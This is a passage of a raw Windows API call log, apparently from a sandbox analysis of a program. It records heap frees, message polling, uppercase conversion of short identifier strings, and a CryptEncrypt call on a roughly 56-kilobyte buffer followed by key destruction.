1 [0199.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0199.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0199.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.827] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0199.827] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.827] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0199.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0199.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.827] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.827] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0199.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0199.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.828] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0199.828] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.828] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0199.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.828] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.829] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.829] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0199.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.829] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0199.829] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.829] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0199.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.829] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.829] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0199.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.830] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0199.830] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0199.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0199.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0199.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0199.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0199.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34c2258 | out: hHeap=0x25c0000) returned 1 [0199.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0199.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0199.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.833] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.834] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xda8a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xda90) returned 1 [0199.834] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.834] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.835] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.835] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.835] CharLowerBuffW (in: lpsz="byte[55952]", cchLength=0xb | out: lpsz="byte[55952]") returned 0xb [0199.835] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.835] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.836] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.836] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.836] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.836] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.836] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.836] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.836] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34c2258*, pdwDataLen=0x8bef68*=0xda8a, dwBufLen=0xda90 | out: pbData=0x34c2258*, pdwDataLen=0x8bef68*=0xda90) returned 1 [0199.837] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.837] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.837] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.837] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.837] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.837] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.837] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.837] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0199.837] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.837] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0199.838] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.838] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.838] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0199.838] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.838] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0199.838] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.838] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.838] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.838] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.838] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.838] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.838] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.838] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.838] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.838] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.838] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.839] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.856] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.857] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.857] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.860] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.865] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.865] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0199.866] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.866] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0199.866] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.866] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.866] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.866] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0199.866] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.866] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0199.866] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0199.866] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.866] CryptDestroyKey (hKey=0xaa58e0) returned 1 [0199.866] 